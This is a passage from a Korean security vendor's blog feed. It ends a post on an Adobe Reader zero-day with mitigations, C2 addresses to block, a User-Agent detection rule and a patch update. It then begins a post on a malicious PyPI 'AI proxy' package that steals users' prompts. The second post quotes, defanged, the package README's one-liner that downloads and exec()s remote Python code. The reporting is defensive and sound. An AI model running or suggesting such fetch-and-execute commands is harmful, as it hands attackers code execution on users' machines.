&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-bottom: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;font-size: 22px; font-weight: bold; color: #111; line-height: 1.3;&quot;&gt;■ 대응 권고&lt;/div&gt;
&lt;div style=&quot;border-top: 1px solid #cfcfcf; margin-top: 10px;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현재&amp;nbsp;Adobe는&amp;nbsp;이&amp;nbsp;취약점에&amp;nbsp;대한&amp;nbsp;공식&amp;nbsp;패치를&amp;nbsp;제공하지&amp;nbsp;않은&amp;nbsp;상태입니다.&amp;nbsp;패치가&amp;nbsp;배포되기&amp;nbsp;전까지&amp;nbsp;아래&amp;nbsp;조치를&amp;nbsp;통해&amp;nbsp;피해를&amp;nbsp;예방하시기&amp;nbsp;바랍니다.&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;개인 사용자&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;JavaScript 실행 비활성화&lt;/b&gt; &lt;br /&gt;Adobe Reader 메뉴에서 기본설정&amp;rarr; JavaScript &amp;rarr; 'Acrobat JavaScript 사용 가능'&amp;nbsp; 항목 체크 해제를 적용합니다. 이 설정 하나만으로 이번 공격을 포함한 JavaScript 기반 PDF 공격의 대부분을 차단할 수 있습니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;출처&amp;nbsp;불명&amp;nbsp;PDF&amp;nbsp;파일&amp;nbsp;열람&amp;nbsp;자제&lt;/b&gt;&amp;nbsp; &lt;br /&gt;신뢰할&amp;nbsp;수&amp;nbsp;없는&amp;nbsp;발신자로부터&amp;nbsp;받은&amp;nbsp;PDF는&amp;nbsp;열지&amp;nbsp;않습니다.&amp;nbsp;특히&amp;nbsp;인보이스,&amp;nbsp;청구서,&amp;nbsp;업계&amp;nbsp;문서로&amp;nbsp;위장한&amp;nbsp;파일에&amp;nbsp;주의가&amp;nbsp;필요합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;보호 모드&amp;middot;보호 보기 설정 확인 &lt;/b&gt;(Adobe&amp;nbsp;Acrobat&amp;nbsp;Pro&amp;nbsp;사용자&amp;nbsp;해당)&lt;br /&gt;Adobe Reader의 보호 모드(Protected Mode) 및 보호 보기(Protected View)가 활성화되어 있는지 확인합니다. 두 기능이 모두 켜져 있으면 악성 PDF가 실행되더라도 피해를 최소화할 수 있습니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Adobe&amp;nbsp;Reader&amp;nbsp;공식&amp;nbsp;패치&amp;nbsp;모니터링&lt;/b&gt;&amp;nbsp; &lt;br /&gt;Adobe의&amp;nbsp;공식&amp;nbsp;보안&amp;nbsp;공지를&amp;nbsp;주기적으로&amp;nbsp;확인하고,&amp;nbsp;패치가&amp;nbsp;배포되는&amp;nbsp;즉시&amp;nbsp;업데이트를&amp;nbsp;적용합니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;보안 담당자&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;공격자&amp;nbsp;C2&amp;nbsp;서버&amp;nbsp;차단&lt;/b&gt;&amp;nbsp; &lt;br /&gt;현재까지&amp;nbsp;확인된&amp;nbsp;169.40.2.68:45191,&amp;nbsp;188.214.34.20:34123을&amp;nbsp;네트워크&amp;nbsp;수준에서&amp;nbsp;차단하고&amp;nbsp;접속&amp;nbsp;시도를&amp;nbsp;모니터링합니다.&amp;nbsp;단,&amp;nbsp;변종은&amp;nbsp;다른&amp;nbsp;인프라를&amp;nbsp;사용할&amp;nbsp;수&amp;nbsp;있으므로&amp;nbsp;IP&amp;nbsp;차단만으로는&amp;nbsp;충분하지&amp;nbsp;않습니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&quot;Adobe&amp;nbsp;Synchronizer&quot;&amp;nbsp;트래픽&amp;nbsp;탐지&amp;nbsp;규칙&amp;nbsp;적용&amp;nbsp;&lt;/b&gt; &lt;br /&gt;User-Agent에&amp;nbsp;&quot;Adobe&amp;nbsp;Synchronizer&quot;&amp;nbsp;문자열을&amp;nbsp;포함하는&amp;nbsp;HTTP/HTTPS&amp;nbsp;아웃바운드&amp;nbsp;트래픽을&amp;nbsp;탐지&amp;nbsp;규칙으로&amp;nbsp;설정합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;PDF&amp;nbsp;뷰어&amp;nbsp;대안&amp;nbsp;검토&lt;/b&gt;&amp;nbsp; &lt;br /&gt;보안이&amp;nbsp;중요한&amp;nbsp;업무&amp;nbsp;환경에서는&amp;nbsp;Adobe&amp;nbsp;Reader&amp;nbsp;외&amp;nbsp;PDF&amp;nbsp;뷰어&amp;nbsp;프로그램&amp;nbsp;사용을&amp;nbsp;고려할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번&amp;nbsp;공격은&amp;nbsp;단순히&amp;nbsp;하나의&amp;nbsp;소프트웨어&amp;nbsp;취약점을&amp;nbsp;악용하는&amp;nbsp;것을&amp;nbsp;넘어,&amp;nbsp;피해자를&amp;nbsp;정밀하게&amp;nbsp;선별해&amp;nbsp;후속&amp;nbsp;공격을&amp;nbsp;설계하는&amp;nbsp;APT&amp;nbsp;수준의&amp;nbsp;정교함을&amp;nbsp;보여줍니다.&amp;nbsp;특히&amp;nbsp;현재&amp;nbsp;패치가&amp;nbsp;존재하지&amp;nbsp;않는&amp;nbsp;제로데이라는&amp;nbsp;점,&amp;nbsp;그리고&amp;nbsp;인보이스&amp;middot;업무&amp;nbsp;문서로&amp;nbsp;위장해&amp;nbsp;의심&amp;nbsp;없이&amp;nbsp;열어보게&amp;nbsp;유도하는&amp;nbsp;방식은&amp;nbsp;일반&amp;nbsp;사용자와&amp;nbsp;기업&amp;nbsp;모두에게&amp;nbsp;실질적인&amp;nbsp;위협이&amp;nbsp;됩니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;Adobe의 공식 패치가 배포될 때까지 JavaScript 비활성화와 출처 불명 PDF 열람 자제가 현재 가장 확실한 예방책임을 다시 한번 당부 드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[2026-04-13 업데이트된 내용 추가]&lt;span&gt;&amp;nbsp;&lt;/span&gt;어도비,&amp;nbsp;CVE-2026-34621&amp;nbsp;보안&amp;nbsp;패치&amp;nbsp;배포&amp;nbsp;(2026.04.11)&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;포스팅 당시 패치가 이루어지지 않았던 해당 제로데이 취약점(CVE-2026-34621)에 대해, 어도비에서 2026년 4월 11일 공식 보안 업데이트(APSB26-43)를 배포하였습니다.&lt;br /&gt;이번&amp;nbsp;패치는&amp;nbsp;Windows&amp;nbsp;및&amp;nbsp;macOS&amp;nbsp;환경의&amp;nbsp;Adobe&amp;nbsp;Acrobat&amp;nbsp;DC,&amp;nbsp;Acrobat&amp;nbsp;Reader&amp;nbsp;DC,&amp;nbsp;Acrobat&amp;nbsp;2024를&amp;nbsp;대상으로&amp;nbsp;하며,&amp;nbsp;아래&amp;nbsp;버전&amp;nbsp;이하를&amp;nbsp;사용&amp;nbsp;중이라면&amp;nbsp;즉시&amp;nbsp;업데이트를&amp;nbsp;적용하시기&amp;nbsp;바랍니다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style12&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 30.7751%; text-align: center;&quot;&gt;제품명&lt;/td&gt;
&lt;td style=&quot;width: 28.4496%; text-align: center;&quot;&gt;취약한 버전(이하)&lt;/td&gt;
&lt;td style=&quot;width: 40.7752%; text-align: center;&quot;&gt;패치 버전&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef;&quot;&gt;Acrobat&amp;nbsp;DC&amp;nbsp;(Continuous)&lt;/td&gt;
&lt;td&gt;26.001.21367&lt;/td&gt;
&lt;td&gt;&lt;b&gt;26.001.21411&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef;&quot;&gt;Acrobat&amp;nbsp;Reader&amp;nbsp;DC&amp;nbsp;(Continuous)&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9;&quot;&gt;6.001.21367&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9;&quot;&gt;&lt;b&gt;26.001.21411&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef;&quot;&gt;Acrobat&amp;nbsp;2024&amp;nbsp;(Classic&amp;nbsp;2024)&lt;/td&gt;
&lt;td&gt;24.001.30356&lt;/td&gt;
&lt;td&gt;&lt;b&gt;Windows:&amp;nbsp;24.001.30362&amp;nbsp;/&amp;nbsp;Mac:&amp;nbsp;24.001.30360&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[업데이트 방법]&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;Adobe&amp;nbsp;Acrobat&amp;nbsp;또는&amp;nbsp;Reader를&amp;nbsp;사용&amp;nbsp;중이라면&amp;nbsp;아래&amp;nbsp;방법으로&amp;nbsp;즉시&amp;nbsp;최신&amp;nbsp;버전으로&amp;nbsp;업데이트하시기&amp;nbsp;바랍니다.&lt;br /&gt;&lt;br /&gt;1. Adobe Acrobat / Reader 실행&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;2. 상단 메뉴 도움말(Help) &amp;gt; 업데이트 확인(Check for Updates) 클릭&lt;br /&gt;3. 최신 버전으로 업데이트 진행&lt;br /&gt;&lt;br /&gt;패치가&amp;nbsp;완료된&amp;nbsp;이후에도&amp;nbsp;출처를&amp;nbsp;알&amp;nbsp;수&amp;nbsp;없는&amp;nbsp;PDF&amp;nbsp;파일&amp;nbsp;열람은&amp;nbsp;각별히&amp;nbsp;주의하시고,&amp;nbsp;기존&amp;nbsp;포스팅에서&amp;nbsp;안내드린&amp;nbsp;보안&amp;nbsp;설정(JavaScript&amp;nbsp;비활성화,&amp;nbsp;보호&amp;nbsp;모드&amp;nbsp;활성화&amp;nbsp;등)은&amp;nbsp;계속&amp;nbsp;유지하시는&amp;nbsp;것을&amp;nbsp;권장드립니다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;취약점&amp;nbsp;관련&amp;nbsp;자세한&amp;nbsp;내용은&amp;nbsp;&lt;a href=&quot;https://helpx.adobe.com/security/products/acrobat/apsb26-43.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;여기&lt;/a&gt;를&amp;nbsp;참고하시기&amp;nbsp;바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[참고 출처]&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://justhaifei1.blogspot.com/2026/04/expmon-detected-sophisticated-zero-day-adobe-reader.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://justhaifei1.blogspot.com/2026/04/expmon-detected-sophisticated-zero-day-adobe-reader.html&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://thehackernews.com/2026/04/adobe-reader-zero-day-exploited-via.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://thehackernews.com/2026/04/adobe-reader-zero-day-exploited-via.html&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5745</guid>
      <comments>https://alyacofficialblog.tistory.com/5745#entry5745comment</comments>
      <pubDate>Fri, 10 Apr 2026 16:58:58 +0900</pubDate>
    </item>
    <item>
      <title>PyPI에 등록된 가짜 AI 프록시 패키지, 사용자 프롬프트 탈취</title>
      <link>https://alyacofficialblog.tistory.com/5744</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1672&quot; data-origin-height=&quot;941&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Z1cEG/dJMcaduK6C6/wkPWyG3iBOaFJY0kexnvEk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Z1cEG/dJMcaduK6C6/wkPWyG3iBOaFJY0kexnvEk/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Z1cEG/dJMcaduK6C6/wkPWyG3iBOaFJY0kexnvEk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FZ1cEG%2FdJMcaduK6C6%2FwkPWyG3iBOaFJY0kexnvEk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1672&quot; height=&quot;941&quot; data-origin-width=&quot;1672&quot; data-origin-height=&quot;941&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근&amp;nbsp;파이썬&amp;nbsp;공식&amp;nbsp;패키지&amp;nbsp;저장소&amp;nbsp;PyPI에서&amp;nbsp;AI&amp;nbsp;프록시&amp;nbsp;도구로&amp;nbsp;위장해&amp;nbsp;백그라운드에서&amp;nbsp;사용자의&amp;nbsp;민감한&amp;nbsp;데이터를&amp;nbsp;은밀하게&amp;nbsp;탈취하는&amp;nbsp;악성&amp;nbsp;파이썬&amp;nbsp;패키지(hermes-px)가&amp;nbsp;발견되었습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 패키지는 Tor 네트워크를 통해 AI 요청을 익명으로 처리해 주는 무료 프록시 도구를 표방했지만, 실제로는 사용자가 AI에 입력한 모든 대화 내용을 공격자 서버로 전송하는 정보 탈취형 악성 패키지였습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;API 키 없이 무료로 사용할 수 있다는 점을 내세워 AI 개발 도구를 찾는 개발자들을 주요 타깃으로 삼았습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 개요 및 흐름&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;hermes-px&amp;nbsp;악성&amp;nbsp;패키지는&amp;nbsp;'EGen&amp;nbsp;Labs'라는&amp;nbsp;가상의&amp;nbsp;회사가&amp;nbsp;개발한&amp;nbsp;제품으로&amp;nbsp;위장했습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;상세한 설치 안내, 코드 예제, OpenAI Python SDK 마이그레이션 가이드, RAG(Retrieval-Augmented Generation:검색 증강 생성) 파이프라인 구성 예시까지 갖춘 완성도 높은 문서를 제공했으며, API 구조도 OpenAI SDK와 동일하게 설계해 기존 개발자들이 별도 학습 없이 바로 사용할 수 있도록 했습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;  참고하세요&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;RAG(Retrieval-Augmented&amp;nbsp;Generation):&amp;nbsp;AI가&amp;nbsp;답변을&amp;nbsp;생성할&amp;nbsp;때&amp;nbsp;외부&amp;nbsp;데이터를&amp;nbsp;검색해서&amp;nbsp;참조하도록&amp;nbsp;하는&amp;nbsp;기술입니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1129&quot; data-origin-height=&quot;767&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNDWeL/dJMb99Tt1KJ/Jx4qW5IXVigZ2ODBrxzmD0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNDWeL/dJMb99Tt1KJ/Jx4qW5IXVigZ2ODBrxzmD0/img.png&quot; data-alt=&quot;[그림 1] PyPI에 게시된 악성 패키지 (출처: JFrog)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNDWeL/dJMb99Tt1KJ/Jx4qW5IXVigZ2ODBrxzmD0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNDWeL%2FdJMb99Tt1KJ%2FJx4qW5IXVigZ2ODBrxzmD0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1129&quot; height=&quot;767&quot; data-origin-width=&quot;1129&quot; data-origin-height=&quot;767&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] PyPI에 게시된 악성 패키지 (출처: JFrog)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;패키지&amp;nbsp;README&amp;nbsp;파일에는&amp;nbsp;사용자가&amp;nbsp;urllib.request와&amp;nbsp;exec()를&amp;nbsp;사용하여&amp;nbsp;GitHub&amp;nbsp;URL에서&amp;nbsp;Python&amp;nbsp;스크립트를&amp;nbsp;직접&amp;nbsp;가져와&amp;nbsp;실행하는&amp;nbsp;방법을&amp;nbsp;안내하는&amp;nbsp;&quot;대화형&amp;nbsp;학습&amp;nbsp;CLI(Interactive&amp;nbsp;Learning&amp;nbsp;CLI&amp;nbsp;)&quot;&amp;nbsp;기능도&amp;nbsp;포함되어&amp;nbsp;있었습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;python&amp;nbsp;-c&amp;nbsp;&quot;import&amp;nbsp;&lt;b&gt;urllib.request&lt;/b&gt;;&amp;nbsp;&lt;b&gt;exec&lt;/b&gt;(urllib.request.urlopen('hxxps[:]//raw[.]githubusercontent[.]com/EGenLabs/hermes/main/demo/hermes_learn[.]py').read())&quot;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이를&amp;nbsp;통해&amp;nbsp;공격자는&amp;nbsp;패키지를&amp;nbsp;새로&amp;nbsp;배포하지&amp;nbsp;않고도&amp;nbsp;추가&amp;nbsp;악성&amp;nbsp;코드를&amp;nbsp;피해&amp;nbsp;시스템에&amp;nbsp;실행할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;별도의&amp;nbsp;공격&amp;nbsp;채널을&amp;nbsp;확보해&amp;nbsp;두었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: justify;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;실제 공격은 다음과 같은 순서로 이루어집니다.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;background-color: #c6c6c6; color: #000000; text-align: justify;&quot; data-ccp-props=&quot;{&amp;quot;134245417&amp;quot;:false,&amp;quot;335559685&amp;quot;:0}&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 93px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 16.3954%; height: 21px; text-align: center;&quot;&gt;단계&lt;/td&gt;
&lt;td style=&quot;width: 83.6046%; height: 21px; text-align: center;&quot;&gt;내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 16.3954%; height: 21px; text-align: center;&quot;&gt;&lt;b&gt;1단계&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 83.6046%; height: 21px; text-align: left;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: justify;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;개발자가&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;PyPI에서&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;hermes-px를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;설치하고&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;프로젝트에&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;통합&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: justify;&quot; data-ccp-props=&quot;{&amp;quot;134245417&amp;quot;:false,&amp;quot;335559685&amp;quot;:0}&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 16.3954%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;2단계&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 83.6046%; height: 17px; text-align: left;&quot;&gt;사용자의&amp;nbsp;AI&amp;nbsp;요청이&amp;nbsp;Tor를&amp;nbsp;통해&amp;nbsp;튀니지&amp;nbsp;대학교&amp;nbsp;내부&amp;nbsp;AI&amp;nbsp;시스템으로&amp;nbsp;무단&amp;nbsp;우회&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 16.3954%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;3단계&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 83.6046%; height: 17px; text-align: left;&quot;&gt;대학&amp;nbsp;서버에서&amp;nbsp;생성된&amp;nbsp;AI&amp;nbsp;응답을&amp;nbsp;받아&amp;nbsp;제공사&amp;nbsp;흔적을&amp;nbsp;변조한&amp;nbsp;뒤&amp;nbsp;사용자에게&amp;nbsp;반환&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 16.3954%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;4단계&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 83.6046%; height: 17px; text-align: left;&quot;&gt;사용자의&amp;nbsp;모든&amp;nbsp;대화&amp;nbsp;내용이&amp;nbsp;공격자&amp;nbsp;서버로&amp;nbsp;실시간&amp;nbsp;전송&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] 공격 흐름&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격의 주요 특징&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;타인의&amp;nbsp;AI&amp;nbsp;인프라&amp;nbsp;무단&amp;nbsp;도용&lt;/b&gt; &lt;br /&gt;악성패키지가 API 키 없이 무료로 AI를 제공할 수 있었던 것은 튀니지 최대 사립대학인 Universite Centrale의 내부 AI 시스템을 무단으로 사용했기 때문입니다. 이 대학이 학생 진로 상담용으로 운영하는 내부 서비스를 사용자 몰래 연결한 방식입니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;접속 시에는 실제 학생이 사용하는 것처럼 위조된 브라우저 정보를 함께 전송했으며, Tor를 통해 우회함으로써 대학 측이 실제 접속자를 추적하기 어렵게 만들었습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;AI 응답이 반환될 때는 'OpenAI', 'ChatGPT' 같은 실제 제공사 흔적을 'EGen Labs', 'AXIOM-1'로 자동 교체하는 응답 위조 기능도 내장되어 있었습니다.&lt;/li&gt;
&lt;/ul&gt;
